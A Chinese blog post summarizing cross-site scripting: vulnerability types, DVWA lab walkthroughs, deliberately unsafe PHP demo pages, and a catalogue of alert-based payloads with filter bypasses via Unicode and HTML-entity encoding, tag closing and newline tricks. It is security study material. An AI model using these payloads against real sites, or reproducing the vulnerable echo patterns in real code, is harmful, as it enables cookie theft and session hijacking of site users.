xss summary

  1. 前言
  2. 正文

前言

学习xss漏洞,并加以总结。
ce5d42ee64aae7cd3f3ae30b6edd529c.JPEG

正文

漏洞起因

可以输入的地方没有做好对应的过滤,引发的xss攻击
```

危害

1.盗取cookie
2.劫持用户浏览器
3.钓鱼攻击
4.挂马
5.在一定的条件下可以getshell
6.会话劫持

漏洞类型

反射型XSS
DOM型XSS
存储型XSS
其他型XSS 例如:Flash xss

反射型xss
危险级别:低
插入的语句停留在当前页面。

DOMX型xss
危险级别:中
DOM型xss又分为两种
1.可见型
2.不可见型
插入的语句影响js

存储型xss
危险级别:高
插入的语句保存在数据库

DVWA测试:
在low级别下的测试,没有任何防御。可以插入任意标签如:

<script>alert('yuan')</script>
<img src=1 onerror=alert(1)>
<a href="javascript:alert(1)">
<input type="text" onclick="alert(1)">

FjAytO.png

如果过滤了alert()如何绕过:

PHP代码:

<?php
$name=$_POST['name'];
$guanjianzi="alert";
$q=str_replace("alert"," ",$name);
echo $q;
?>

html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Demo1</title>
</head>
<body>
<h1>输入你的名称</h1>
<form method="POST" action="demo1.php">
    输入:<input type="text" name="name">
    <input type="submit">提交</form>
</form>
</body>
</html>

当输入alert的时候就会被替换成空,当然我们可以使用其他的什么标签来代替script,但是如果只用script如何绕过呢?使用js转义。将alert转义

当js解释器在标识符名称(例如函数名,属性名等等)中遇到unicode编码会进行解码,并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。

也就是说unicode编码只能编码属性名

<script>alert(1)</script>

js转义后

<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

FjEh24.png

注意:使用unicode编码之前要确定对方有没有过滤\

html转义:

当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中
(<a href='xxxx'>)进行实体字符解码变为相应的字符,而不会发挥出其本来该有的功能,
如:&#60;被解码为<后仅被当作字符,而不会被当成标签名的起始。既然是字符串,
那在href='xx'这些属性值本来就是字符串的地方可以作为一种可能的绕过的手段,JS字符串中,字符还可以表示为unicode的形式

源:

<a href="javascript:alert(1)">s</a>

转义后

<a href="javascript:&#97;&#108;&#101;&#114;&#116;&#40;1&#41;">s</a>

FjVKZq.md.png

FjVmss.png

输出在<script></script>之间的情况

<?php
$name=$_POST['name'];
$guanjianzi="alert";
$q=str_replace("alert"," ",$name);
$c="<script>var w=[$q]$q;</script>";
echo $c;
#echo " <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>";
/*
 <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>
 *
 */
#echo "<script> var a=[]</script><script>alert(1)</script><script>var a=[];document.write(a);</script>";
?>



绕过:

]</script><script>\u0061\u006c\u0065\u0072\u0074(1)</script><script> //闭合对应前后script标签

FjdSVx.png

输出在html属性里面
假设输出在input标签里面

<?php
$name=$_POST['name'];
$guanjianzi="alert";
$q=str_replace("alert"," ",$name);
$c="<input value='$q'>";
echo $c;
#echo " <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>";
/*
 <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>
 *
 */
#echo "<script> var a=[]</script><script>alert(1)</script><script>var a=[];document.write(a);</script>";
?>

绕过:

1' onclick='&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

FjBGsH.png

假设输出在img标签里

<?php
$name=$_POST['name'];
$guanjianzi="alert";
$q=str_replace("alert"," ",$name);
$c="<img src='$q'>";
echo $c;
#echo "<img src='' onerror='&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;'>";
#echo " <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>";
/*
 <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>
 *
 */
#echo "<script> var a=[]</script><script>alert(1)</script><script>var a=[];document.write(a);</script>";
?>

绕过:

'1/**/onerror='&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

FjBdFP.md.png

输出在标签里的绕过总结:

1.先想办法闭合周围的什么双引号之类的东西
2.判断有什么过滤掉的,如果没有过滤自然最好
3.查询标签对应可以执行js的属性,然后插入代码即可

DOM型的xss
这里非常蛋疼,chrome拦截了DVWA那边的xss,还要我开虚拟机。。。
DOM型xss分为两种:
1.可见型DOM xss
2.不可见型DOM xss

何为DOM?,你插入的代码会暂存在某些标签之中,并且影响输出

DVWA的DOM xss就是不可见类型
FvJ9te.png

源代码不可见
FvJipd.md.png

F12可见
FvJF1A.md.png

low级无任何防御直接插入payload
FvJVnP.md.png

medimu级过滤了script


<?php 

// Is there any input? 
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default']; 

    # Do not allow script tags 
    if (stripos ($default, "<script") !== false) {  /*判断script是否出现在了参数里面*/
        header ("location: ?default=English"); 
        exit; 
    } 
} 

?> 
使用:</select><img src=1 onerror=alert(1)> //要闭合select标签,因为img在select标签里面是不可见的

FvJZ0f.md.png

high级对default进行了判断

<?php 

// Is there any input? 
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {  /*判断是否有default这个键名和传的GETdefault参数不为null*/

    # White list the allowable languages 
    switch ($_GET['default']) {  /*判断default是否为三个的其中一个,如果不是则重新设置header头,302跳转*/
        case "French": 
        case "English": 
        case "German": 
        case "Spanish": 
            # ok 
            break; 
        default: 
            header ("location: ?default=English"); 
            exit; 
    } 
} 

?> 

使用#杀掉判断

#<script>alert(1)</script>

FvJyB6.md.png

存储型xss
当我们插入的恶意代码都会保留在数据库,下次在访问的时候就会自动执行js。

每次进入到页面都会执行js

FvJj3j.md.png

这里就不重复了,告辞(滑稽)
用beef来配置存储型xss是个不错的选择

总结:

xss漏洞起因
    没有做好对应的过滤标签措施,导致攻击者可以注入恶意代码

对付那种无任何过滤的
    <img src=1 onerror=alert(document.cookie)>
    <script>alert("xss")</script>
    <script>eval(alert('xss'))</script>
    <a href="javascript:localhoin=alert(1)">GO</a>

输出在&lt;script&gt;&lt;/script&gt;之间的情况(意思就是你在script里面,得把前面的闭合了在注入语句,然后因为你在script里面直接输入语句即可)
    先闭合上一个script然后在注入恶意代码:</script><script>alert("xss")
    如果<,>,/等符号被过滤了可以用:eval(alert(1)) #eval()函数用于直接执行代码 参考:http://www.runoob.com/jsref/jsref-eval.html

输出在其他标签里面
    注意:html转义后在标签的属性中会其到一定的绕过作用 参考文章:https://www.cnblogs.com/iceli/p/8598709.html
     当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中(<a href='xxxx'>)进行实体字符解码变为相应的字符,而不会发挥出其本来该有的功能,如:&#60;被解码为<后仅被当作字符,而不会被当成标签名的起始。既然是字符串,那在href='xx'这些属性值本来就是字符串的地方可以作为一种可能的绕过的手段。如:
        <a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"></a>
    如在<input>里,解决办法:<input type="text" value="" onclick="alert(1)">
    出现在a标签的href里面,类似于:<a href="javascript:wds=''http://www.dddd.com".getElementById('ddd').value+'&g=<你输入的值>'>
    由于在href里面,可以使用javascript。就构造<a href="javascript:wds=''http://www.dddd.com".getElementById('ddd').value+'&g=alert(1)'>
    如果单引号等字符被过滤的话,使用:<a href="javascript:wds=''http://www.dddd.com".getElementById('ddd').value+'&g=alert&#x28;1&#x29'> //实体化被过滤的符号

 宽字节xss:
    如果页面用了gbk编码的话,可以用对应的编码进行编码被过滤的符号导致可以绕过过滤

 空格被实体化过滤
    注解:javascript的注释符为/**/ , //
    当空格被过滤后,使用注释符来绕过。例子:
    location.href="........."+"&ss=aaaa\"+"&from==1;function/**/from(){}//"+"&param=";
    location.href="........."+"&ss=aaaa\"+"&from==1;alert(1);function/**/from(){}//"+"&param=";

    学到的js的一个特性:javascript会先解析函数在解析其他
    例子:
    a();
    function as() {} 


    而js执行顺序是:
    function as() {}
    a();

当输入的语句出现在注释里 (有机可乘的xss)
    当输入的语句出现在js注释的源码的时候,加一个换行符就能引发xss
    例如:http://xxx.com/jj.php?xxx=aaaaa

    <script>
    //function  A() {
    //    var g=getElementById(demo).value;
    //    document.write(g);
    //}
    //document.write(你输入的)
    document.write("wwww")
;    </script>

    构造的xss语句:http://xxx.com/jj.php?xxx=%0aalert(1) //) #通过%0a换行符,换到了没有注释的下一行然后闭合掉后面的括号

使用反斜杆构造xss
    当输入的语句处于多行js代码之中,使用\分开,例子:
    <script>getTop().location.href="/cgi-bin/loginpage?autologin=n&errtype=1&verify=&clientuin="+"&t="+"&alias="+"&regalias="+"&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%252Fcgi-bin%252Fsetting10%253Faction%253Dlist%2526t%253Dsetting10%2526ss%253Dindex%2526Mtype%253D1%2526clickpos%253D20%2526loc%253Ddelegate%252Cwebmap%252C%252C1"+"&title="+"&url=%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26ss%3Daaa%2522%26from%3Dbbb\%26delegate_url%3D%252Fcgi-bin%252Fframe_html%253Furl%253D%2525252Fcgi-bin%2525252Fsetting10%2525253Faction%2525253Dlist%25252526t%2525253Dsetting10%25252526ss%2525253Dindex%25252526Mtype%2525253D1%25252526clickpos%2525253D20%25252526loc%2525253Ddelegate%2525252Cwebmap%2525252C%2525252C1"+"&org_fun="+"&aliastype="+"&ss=aaa"+"&from=bbb"+"&param="+"&sp=6fa57ce5b3047ebMTM1NTQwOTA2Mg"+"&r=3ec785174fff5206ed6f0cf4a8c5e3c5"+"&ppp="+"&secpp="</script>
    使用\分割语句然后想办法闭合

 :反弹xss一般出现在url拦

DOM型xss
DOM型的xss就是通过输入,改变了js代码的一部分。dom型xss又分两种:
1.可见型DOM xss,输入的东西改变了页面的源码。但是F12查看源码可见
类似于:
<strong id="titleshow">按职业1检索:aaaaaaa </strong></div>
<script>
if("aaaaaaa"=="")
document.getElementById("titleshow").innerHTML="按地区检索:全部明星";
if("职业1"=="职业1")
document.getElementById("titleshow").innerHTML="按职业检索:aaaaaaa";
if("职业1"=="职业2")
document.getElementById("titleshow").innerHTML="按职业检索:aaaaaaa";
if("职业1"=="职业3")
document.getElementById("titleshow").innerHTML="按职业检索:aaaaaaa";
</script>
aaaaa为我们输入的,假设现在<,>被过滤了。但是\没被过滤,该如何构造xss呢
由于\没有被过滤,使用unicode编码<和>,变为
被url解释器解释完后为<a href="javascript:alert(1)"></a>,url中出现了javascript:,指明了后面的语句要当作js执行,所以再次把解释后的字符交给js解释器解释,可以弹窗。

当js解释器在标识符名称(例如函数名,属性名等等)中遇到unicode编码会进行解码,并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。如:

 <script>\u0061\u006c\u0065\u0072\u0074(1)</script>
 unicode编码在标签的属性之中可用,如果在输出使用不会影响上下文

 参考文章:https://www.cnblogs.com/iceli/p/8598709.html


2.不可见型DOM xss
    类似于DVWA里的DOM型xss,只能用调试工具定位。审核源代码是看不见的
    记录一些DOM型xss常用的语句:
    在iframe中执行js:<iframe onload="alert(1)"></iframe>
                               <iframe src="javascript:alert(1)"></iframe>
                               <iframe src="vbscript:msbox(1)"></iframe> IE执行VBScript代码
                               <iframe src="data:text/html"><script>alert(1)</script> chrome执行data协议代码
                               <iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe> 上面的变体
                               <iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe> chrome下的srcdoc属性
 总结:在探测一个地方是否有xss的时候,插入好搜索的语句例如:aaaaaa。然后f12源码搜索,分析出现的地方,看看哪里能实现xss。如果有被过滤
 了,先试试html转义,注意闭合。当\符号没被过滤的时候可以使用unicode编码来进行代替被过滤的函数或符号 (前提是在script标签里)

  存储型xss:
        一定要记住本节最开头的话,存储型XSS,输出的位置不一定出现在输入的位置。
        7. 因而我们有时候需要逆向的思维,来寻找存储型XSS。 大概思路如下:
        7.1 先找到输出点,然后猜测此处输出是否会被过滤。
        7.2 如果觉得可能没过滤,我们再找到这个输出是在哪里输入的。
        7.3 接着开始测试输入,看输出的效果。
        7.4 如果没过滤,那么你就成功了,否则你可以放弃掉它。

xss 存储型payload:http://html5sec.org/

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:xss summary

本文作者:九世

发布时间:2019-01-12, 08:35:06

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/5104189a.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录